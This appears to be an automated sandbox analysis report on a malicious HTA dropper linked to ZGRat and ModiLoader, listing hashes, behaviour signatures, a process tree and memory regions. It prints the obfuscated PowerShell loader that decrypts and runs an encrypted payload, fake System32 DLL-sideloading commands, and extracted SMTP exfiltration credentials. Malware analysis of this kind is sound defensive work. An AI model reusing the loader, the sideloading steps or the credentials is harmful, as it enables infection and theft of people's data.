Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
23-04-2024 14:08
General
-
Target
23042024_2208_yt.hta
-
Size
76KB
-
MD5
16d297e8eee126e4b52198eff43b6c36
-
SHA1
5ff70dd47d868edb3f837511a55030810ec7968b
-
SHA256
9a3b2d8d0e1da113f6c12a4d1517c71b8810006a3031cf129ce2ace2b2be673f
-
SHA512
604ef34a0953d7fa1a435115f603ca45ff5b26f5033d1611d28febe2440b45e8506ef5f8eabf1b6302d4ae61a10964f6086b4e3387c3c5aab06932bace13c6e5
-
SSDEEP
1536:JGgLIQnvgGY9GpGOG2GSGhGKpSozTqQZwnLPcS:TvTY9GpGOG2GSGhGKpvzTTZeLUS
Malware Config
Extracted
Protocol: smtp- Host:
mail.irmaklarpaslanmaz.com.tr - Port:
587 - Username:
muhasebe@irmaklarpaslanmaz.com.tr - Password:
MH5473588PmZ
Signatures
-
Detect ZGRat V1 27 IoCs
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
ModiLoader Second Stage 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies registry class 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 15 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\23042024_2208_yt.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\Book1.xlsx"4⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\uc.exe"C:\Users\Admin\AppData\Roaming\uc.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"6⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y6⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"6⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y6⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"6⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y6⤵
- Enumerates system info in registry
-
C:\Windows \System32\easinvoker.exe"C:\Windows \System32\easinvoker.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF5⤵
-
C:\Users\Public\Libraries\bwsiuvcU.pifC:\Users\Public\Libraries\bwsiuvcU.pif5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD52af9a1590fc91ba974cedd68e37ec196
SHA1474bbaddfd3b618988248e4c05e51a5f8952abf5
SHA256be52290ce5a1ac21bf6bcf663239f2a415bc5ecdda3b6519e8249060534ea498
SHA512b514925beafb256ca57859f6fdc9035a23ca17b7636c82651f132fe7f4f370ec1e1cd60a9b75e7f5af2e1b65901b42b735c50331dd350ac01f1128682c2a30a7
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltnh1aua.bzf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Book1.xlsxFilesize
7KB
MD51bf87ff1495f215ddfb6c3790dbe6ce9
SHA168cf7434e8b064ae913ad6f1c35b6fbbfaa611e8
SHA2567af5ae538f476b80c64c21104a5898000e309368ea1515adeea90fb19127503b
SHA5121ff153660a86f0048e0bb24684d2d9508a8eab2b91ea5d844001437d7445f5c7ecf4b0258ea8f033e22160e14583cadefc4e9b1af7f195310a0d0537fb9b7ac5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
219B
MD5a78c7a2f12efeec747d8f4301d119d95
SHA1196ba9641b4a0a0f805e696547c4c3605f7dc877
SHA25672513190c8b0fb0ead0238310762adb1e582c58276a456b50f9f3aced9dd6cbb
SHA512313f966d5523929ac7e1c5dbb5a4d260aa63e26dd1d8a75edf7c73eca500aa8efdbbb9c9e6d68aae79ef2929288806e1d5bf33ce086071642df8aff3c06aa58d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msFilesize
855B
MD53985922d9faec5257a38b1d1e37107d7
SHA12c456a8543c5e50f711b16c469c7b3ba067e7413
SHA256a13b8948f0f3984891e58e19b60be103a465d10d3601579282d6005692d58b14
SHA5129c0da31158013f01c8bdb637198c9ceb1e77fc121cbc2ea898afed0b4a3ae53a998b8f7c15f2d365c82716016724147ba2a6cdbebf7ac3551e6aa7b4cc9817d1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msFilesize
24B
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
C:\Users\Admin\AppData\Roaming\uc.exeFilesize
1.6MB
MD5e6ac6ca27aa2d60dc59a21af1ffdb086
SHA19f847e34521e8917c8b22eca53b71306bc19af18
SHA256a5b3ce892d48757df98fea906dff92e0210dcbd8d1832e43dfbd2a5ece61fba1
SHA5129f4c1e3cb03cd1333a7f2e01f7a3d61803844fc4c1531dd432cc7b7dedc5625d1253715200cb7e0f6b9c7f906a6dcbb488196153e1e2dc935b27b66d74431ee4
-
C:\Users\Public\Libraries\UcvuiswbO.batFilesize
29KB
MD5828ffbf60677999579dafe4bf3919c63
SHA1a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc
SHA256abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d
SHA512bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e
-
C:\Users\Public\Libraries\bwsiuvcU.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Libraries\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Users\Public\Libraries\netutils.dllFilesize
112KB
MD56baaea4d3a65281b55173738795eb02c
SHA11fbe7ec7f5e2d1fb0ab1807e149eee66a86f9224
SHA2560007fa57da2e1de2e487492d00b99abaeca7e9f9cac8a10e24eb569e19f76ee1
SHA512af0285cf961aeae960ede41f195809e9b84ccb262f17f2e994da5c599ebdf712788e5a3f2e0e2ed16e67aa888bdabfd7a6096ad8dda2d062d2f82b010e81d5c5
-
memory/1540-48-0x00007FF9A4BB0000-0x00007FF9A4BC0000-memory.dmpFilesize
64KB
-
memory/1540-59-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-1246-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-169-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-180-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-62-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-63-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-1245-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-60-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-61-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-57-0x00007FF9A2520000-0x00007FF9A2530000-memory.dmpFilesize
64KB
-
memory/1540-42-0x00007FF9A4BB0000-0x00007FF9A4BC0000-memory.dmpFilesize
64KB
-
memory/1540-44-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-45-0x00007FF9A4BB0000-0x00007FF9A4BC0000-memory.dmpFilesize
64KB
-
memory/1540-43-0x00007FF9A4BB0000-0x00007FF9A4BC0000-memory.dmpFilesize
64KB
-
memory/1540-47-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-1244-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-46-0x00007FF9A4BB0000-0x00007FF9A4BC0000-memory.dmpFilesize
64KB
-
memory/1540-49-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-50-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-51-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-53-0x00007FF9A2520000-0x00007FF9A2530000-memory.dmpFilesize
64KB
-
memory/1540-52-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-54-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-55-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-56-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1540-58-0x00007FF9E4B30000-0x00007FF9E4D25000-memory.dmpFilesize
2.0MB
-
memory/1684-23-0x0000000002130000-0x0000000002140000-memory.dmpFilesize
64KB
-
memory/1684-37-0x0000000006FA0000-0x0000000006FC2000-memory.dmpFilesize
136KB
-
memory/1684-36-0x0000000007080000-0x0000000007116000-memory.dmpFilesize
600KB
-
memory/1684-34-0x00000000060A0000-0x00000000060E4000-memory.dmpFilesize
272KB
-
memory/1684-24-0x0000000002130000-0x0000000002140000-memory.dmpFilesize
64KB
-
memory/1684-38-0x0000000008110000-0x00000000086B4000-memory.dmpFilesize
5.6MB
-
memory/1684-22-0x0000000070B30000-0x00000000712E0000-memory.dmpFilesize
7.7MB
-
memory/1684-35-0x0000000006DE0000-0x0000000006E56000-memory.dmpFilesize
472KB
-
memory/1684-90-0x0000000070B30000-0x00000000712E0000-memory.dmpFilesize
7.7MB
-
memory/2100-95-0x0000000002930000-0x0000000003930000-memory.dmpFilesize
16.0MB
-
memory/2100-118-0x0000000000400000-0x000000000059C000-memory.dmpFilesize
1.6MB
-
memory/2100-91-0x0000000000970000-0x0000000000971000-memory.dmpFilesize
4KB
-
memory/2100-92-0x0000000002930000-0x0000000003930000-memory.dmpFilesize
16.0MB
-
memory/3896-175-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-173-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-1218-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/3896-1217-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-1216-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-1215-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-1213-0x0000000029C70000-0x0000000029C7A000-memory.dmpFilesize
40KB
-
memory/3896-1212-0x0000000029A40000-0x0000000029AD2000-memory.dmpFilesize
584KB
-
memory/3896-1210-0x0000000029460000-0x00000000294FC000-memory.dmpFilesize
624KB
-
memory/3896-1209-0x0000000029410000-0x0000000029460000-memory.dmpFilesize
320KB
-
memory/3896-159-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-146-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3896-1208-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-148-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3896-149-0x00000000284A0000-0x00000000284FA000-memory.dmpFilesize
360KB
-
memory/3896-150-0x0000000028580000-0x00000000285DA000-memory.dmpFilesize
360KB
-
memory/3896-151-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-152-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-154-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-157-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-143-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3896-156-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3896-161-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-163-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-165-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-167-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-205-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-170-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-172-0x0000000028670000-0x0000000028680000-memory.dmpFilesize
64KB
-
memory/3896-203-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-201-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-177-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-179-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-174-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-183-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-182-0x0000000074AD0000-0x0000000075280000-memory.dmpFilesize
7.7MB
-
memory/3896-199-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-185-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-187-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-189-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-191-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-193-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-195-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/3896-197-0x0000000028580000-0x00000000285D3000-memory.dmpFilesize
332KB
-
memory/4688-135-0x00000000613C0000-0x00000000613E3000-memory.dmpFilesize
140KB
-
memory/4988-3-0x00000000052D0000-0x00000000052E0000-memory.dmpFilesize
64KB
-
memory/4988-89-0x0000000070B30000-0x00000000712E0000-memory.dmpFilesize
7.7MB
-
memory/4988-18-0x0000000006760000-0x000000000677E000-memory.dmpFilesize
120KB
-
memory/4988-1-0x0000000070B30000-0x00000000712E0000-memory.dmpFilesize
7.7MB
-
memory/4988-17-0x0000000006300000-0x0000000006654000-memory.dmpFilesize
3.3MB
-
memory/4988-20-0x0000000007E90000-0x000000000850A000-memory.dmpFilesize
6.5MB
-
memory/4988-96-0x0000000070B30000-0x00000000712E0000-memory.dmpFilesize
7.7MB
-
memory/4988-19-0x00000000067A0000-0x00000000067EC000-memory.dmpFilesize
304KB
-
memory/4988-4-0x0000000005910000-0x0000000005F38000-memory.dmpFilesize
6.2MB
-
memory/4988-5-0x00000000057B0000-0x00000000057D2000-memory.dmpFilesize
136KB
-
memory/4988-6-0x00000000060B0000-0x0000000006116000-memory.dmpFilesize
408KB
-
memory/4988-12-0x0000000006190000-0x00000000061F6000-memory.dmpFilesize
408KB
-
memory/4988-0-0x00000000051A0000-0x00000000051D6000-memory.dmpFilesize
216KB
-
memory/4988-2-0x00000000052D0000-0x00000000052E0000-memory.dmpFilesize
64KB
-
memory/4988-21-0x0000000006C90000-0x0000000006CAA000-memory.dmpFilesize
104KB